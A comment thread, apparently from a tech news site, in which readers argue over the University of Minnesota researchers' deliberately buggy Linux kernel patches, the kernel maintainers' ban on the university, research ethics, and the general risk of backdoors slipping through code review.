Duh... Really want to piss off an open-source project, just make more work for the maintainers that are already so overloaded they barely have time to breathe. And then to find out the extra work was cause by a couple of nit-wits with free time of their hands -- and you have the recipe for disaster.
Do I understand the security egg-head comments, sure and hardening the commit system is for down the road, but was Greg's response an overreaction - no. It was measured and appropriate. It wasn't designed to prevent all future attempts, but instead it was properly punitive, to deter similar behavior by institutions in the future.
You would have thunk institutions learned there lesson related to ethically questionable testing after Kaczynski...
It wasn't designed to prevent all future attempts, but instead it was properly punitive, to deter similar behavior by institutions in the future.
Isn't there now a risk of a Streisand effect, where lots of other people will try & sneak code in 'for fun", since it's been proved to be possible. Might have been better for the kernel folks to have just had a quiet word with the Uni, while improving the processes which allowed this to happen.
It's been proved to be possible. But that was never really in doubt. (Every time the kernel team accept a bug fix they are implying that they had previously accepted a bug.) What's new here is that we've found out the consequences when you get found out. It doesn't look "fun" to me.
"Isn't there now a risk of a Streisand effect, where lots of other people will try & sneak code in 'for fun", since it's been proved to be possible."
I doubt it. It's not very easy to introduce something just for fun. Submitting a basic patch allows people to say they did something and not have someone angry at them.
"Might have been better for the kernel folks to have just had a quiet word with the Uni, while improving the processes which allowed this to happen."
Oh no it wouldn't. If people were going to tamper with the code, the research paper itself made that idea public. Keeping this quiet would have left that paper as the last word. What the Linux kernel community has done now is to demonstrate that maybe you can insert useless or dangerous code into the kernel, but if you get caught, they will target you with all the power they have. They have established a deterrent to people contemplating pulling the same kind of stunt.
Not sure if this is a just lawsuit from IBM/others, or a visit from the FBI.
I spend enough time listening to the "Piracy is Theft, $500,000 fine" people. What does the law say about trying to hack software used by many critical infrastructures?
Trying to get hired by companies to put backdoors into their products doesn't really need much academic research by the way. It's a well known attack, with plenty of examples to study without breaking the law yourself.
"One last point worth raising, the kernel teams response should probably treat Uni researchers the same regardless of their nationality. Do we really want them setting a precedent that Uni's in China, Iran, and Russia can attempt unauthorized penetrations without sanctions?"
I imagine I would get the same treatment if I submitted the PRs - and I am not a citizen of any of those countries. A mammoth responsibility to police this.
The facts though cannot be ignored:
1) An accredited University actually approved the research. Is this the way research happens these days?
2) The commits made it to the queue. They did not make it to either staging or linus-next. My worries are for any APT crew or some other 3 letter agency - how easy is it to slip in a PR with SE?
It is disappointing on many levels to me.
CVEs usually aren't the result of a single change. Someone changes something, someone changes something else that touches some of the things changed in the first change, and so on, and an invalid assumption somewhere about the entire control flow through a certain code section or lifetime of a data structure results in the CVE.
Not saying your idea doesn't have merit, but it is unlikely find very many CVEs that can be definitively linked to a single submission, and even if you do you'd have to find a pattern of such submissions from the same source before you could determine it was deliberate.
If I was trying to deliberately bug the Linux kernel, I would insure that my submissions came from a variety of aliases, making sure to use different coding/commenting styles to the extent possible, having some submissions translated into other languages and then back to English to give them that "English is my second or third language" feel, etc. so they wouldn't be seen as coming from the same source. In other words, I'm pretty sure if any nation state is bugging up the Linux kernel, you'll never find it by looking at who contributed the patches that resulted in CVEs.
Not that the kernel is the best place for such attacks anyway, since they probably don't need/want kernel level access in most cases.
Don't you think that's the whole idea? Perhaps to trace kernel bugs back to their original source, through however many commits, to find out if there may be a better way to handle code changes? Sure, it sounds complicated as can be, but if it does actually generate a better methodology....
Exactly. The question is not detecting a single malicious commit, but instead identifying how bugs happen. Whether deliberate or accidental, the goal is not to have them. So look at how they came to be and see what patterns there are. Is there a type of bug that doesn't get caught often? If so, can testing or review be improved to detect it? Is there something that reviewers consistently fail to catch? What is it and can something be done to draw their attention to it? That's real effective research.
Have these two researchers been living under a rock for the last many tears? Tell me if that sounds like news:
“Penetration without consent is not OK”.
Yes, bad joke, but the principle stands: the experiment might have been interesting also for the Kernel, but the big fishes should have been informed (also only Torvalds, probably, would have been enough).
Done like this is just a waste of everybody’s time, and banning trolls is usually good policy.
The only regret at this point is that probably we won’t have an uncensored commentary from Linus... given the dumbassery of the two, it would have been just gold.
Until a few months ago, Burger King was my favored drive-thru hamburger restaurant. Good for a quick meal on my way. Then I read an article in one of the national newspapers about a social experiment that BK performed in some of it's outlets to see if anyone would stand up to a "bully" abusing another "customer." Despite their laudable goal, I haven't been back since.
Just what I was thinking. Those who might have been considering going to this Uni might now reconsider, thus pulling funds from their coffers. Students aren't morons and they may well consider the Uni leadership to be unethical and idiotic for sanctioning this.
There's also the noise this might make in the "donation depts" of corporate sponsors, will they be prepared to put money into further research projects in a Uni who's leadership have proven to have questionable ethics or a complete lack of common sense.
Losing ability to make submissions to the core Linux projects might no seem like much, but it's the bad PR noise that will continue to reverberate for a time.
That's a nice dream, but how many 17-year-olds considering as CS degree are keeping up with the news in this sector?
As for the corporates, that's a serious case of glass houses. What most corporations do on a daily basis makes this look positively uplifting.
Heck, how many people right hear are going to be able to remember if is was Wisconsin or Minnesota in three months time?
Seems to me that if a malign covert agency wished to insert something into the Linux code base then an obvious thing to do is devote a lot of time to developing entirely beneficial updates, and insert their desired malware as just one item within a large number of entirely benign updates. What is more, in such a situation it might even be possible to blame an unknown 3rd party for the malicious code, and retain credibility. This would require the agent to have commitment to play a very long game indeed, but such agents are not entirely unknown.
Agreed with your assessment 100%.
Once the "bad" code reaches production, then it'll be next to impossible to detect... and depending on its level in the hierarchy of the OS, will be either easy to forcibly eject/remove or it will be a real PITA to remove...
Nip these things in the bud before they get a chance to gain a foothold.
So the assumption being that it's open source so everyone can read the code, so there's no point in checking it / hey what the heck, it's Friday syndrome, let's go / it's from a Uni, it's probably fine. This happened with Netgate and Wireguard which nearly ended up in BSD. It's also not the first time that something dubious has sneaked in - Canonical found that out with crypto miners being sneaked into snaps. Thank goodness they have an Ubuntu Security Team...
I think we have to face facts that this is going to become more of a problem with time and, yes, you're going to have to check the code prior to it being released. You could use automation to a certain degree but in reality it's an independent audit that's going to minimise this.
The bigger question should be how many commits have sneaked through without anyone noticing? Kind of like the sudo privilege escalation vulnerability that sat there for years. Accident / intentional, does it matter? I would imagine some of the best backdoors would come with a healthy dose of plausible deniability.
University of Minnesota: Hello github (and gitlab.
github (and gitlab): *ponder* pro-active security, should we temporarily block umn.edu now, and review that decision in 3 to 5 years or maybe 10 years.
I wonder how this will affect the University of Minnesota future donations and endowments. Although if the whole sexual assaults thing had no effect I guess this will have none either.
https://en.wikipedia.org/wiki/University_of_Minnesota#Sexual_assaults
I think the previous commentards have covered this pretty well, but the thing that occurs to me is that not only have these numpties trashed their own credibility, but have also potentially damaged the prospects of all the other students at the Uni - as well as those that have left recently and just entered the job market.
I can just see an HR dept, looking through resumes, "Hmmm studied at... Oh." {shuffle} Hey this guy in Canada looks good.
The response of Linux maintainers here is childish. This demonstrates flaws in their code review process, they should be thanking the University of Minnesota team instead of banning anyone with a umn.edu email address (a meaningless and pointless gesture).
Open source software is supposed to be about openness and this is the sort of thing you'd expect from Microsoft.
In the councils of government and public institutions, we must guard against the acquisition of unwarranted influence, whether sought or unsought, by the Evergreen-Woke complex. The potential for the disastrous rise of misplaced code and conduct exists and will persist. We must never let the weight of this combination endanger our liberties or democratic processes.
This post has been deleted by its author
...IFF they'd followed the same procedure as in "Red Team" / "White-Hat Hacker" penetration testing: Cleared it with someone high up in the command chain (Greg K-H, or Linus?) beforehand. Just like at any company that conducts such a test the head of security (or if they are also being tested, the CTO / CEO or some such) is in the loop.
Then that person could have quietly followed the patches' path through the review process (they should of course be alerted to the specific intentionally-bugged ones through private communication) and stop them on some pretense -- perhaps just actually "finding" the bug themselves -- if they got too far. (And the "reveal" after the experiment was over would most probably have been received differently by the maintainers if it then came from that person.)
Without that, though, I can't see how it's legitimate.
The fundamental problem an OSS project has is time for its members to work. What this carelessly thought out episode has done is to highlight this.
What that shows is that you can get control of such a project so that you can inject code; simply have more resources.
Say a mega Corp wanted control of an OSS project. By allocating a lot of resources to the project, the work of those people starts outstripping every one else. Gradually the project takes on more of a flavour of the mega Corp and less of the original team. Once every one using it is hooked and cannot reasonably sustain a fork, you have control.
It's still OSS, but no one else has the resources to benefit from the openness.
And this has already happened. Anyone heard of RedHat, Pulse Audio, Systemd, and the thing that forces us to use those things; Gnome?
I rest my case.
Would not to see if it could penetrate the infrastructure. That's not the sort of thing that you can risk. You either do or you do not. The motivation from the CCP would be to slow down/weaken kernel development generally. Wasting people's time, generating controversy, generally monkey-wrenching the process. You do enough, and the volunteers find better uses for their time.
Is of course ceremonial. But the only other thing to do would be to attempt a class action lawsuit. And how much time does that waste? Personally, I would send a bill, and go VERY public when it was rejected.
As some one else mentioned, if they had targeted a corporate-run organization, a lawsuit almost certainly would be forthcoming.
How the mighty have fallen and been cast down. The school that gave us Gopher has now been banned from the Linux Kernel. And banned for a Bad Idea so stupid and bone-headed it's as if the whole scheme was dreamt up by a drunken freshman at his first Frat party.
I can say, without a shadow of a doubt, that I never thought I'd see this day.
not one mention of the tentative backdooring of the Linux kernel in 2003 through the BitKeeper repository :
https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/
What happened then was a malicious attack by a high-profile actor, and while it was catched it has never (so far I know) been cleared. Since then, BitKeeper was replaced by git, but I also never saw an investigation whether git would intercept the same attack. What GKH hear clearly says is that he's not interested in such an investigation, doesn't want anyone to even consider testing such an intrusion, and everybody should just trust him because he's the good guy.
So, before going any further, what happend with that 2003 attempt ? Who was behind it ? How did they pull it off ? What has been undertaken by the kernel "community" to prevent the same scenario to happen again ?
If a bunch of white-hats investigate security of a commercial product without asking (because the supplier doesn't care about security, and should, or because they know it's insecure and are trying to hide it) we have no problem with that - especially if the vulnerability causes PII to be leaked. Attempts to apply various Computer Misuse acts, and to sue for damages are vigorously defended.
So, these guys probed the security of Kernel code submissions. This is also a product for which security is very important. The response has been to dump on the researchers, instead of tightening security procedures. The fact that many (not all) of the staff that were inconvenienced are volunteers is neither here nor there.
Pot/Kettle?
Linux Kernel security is one of the most important things in IT today. Security-checking patches is part of the job.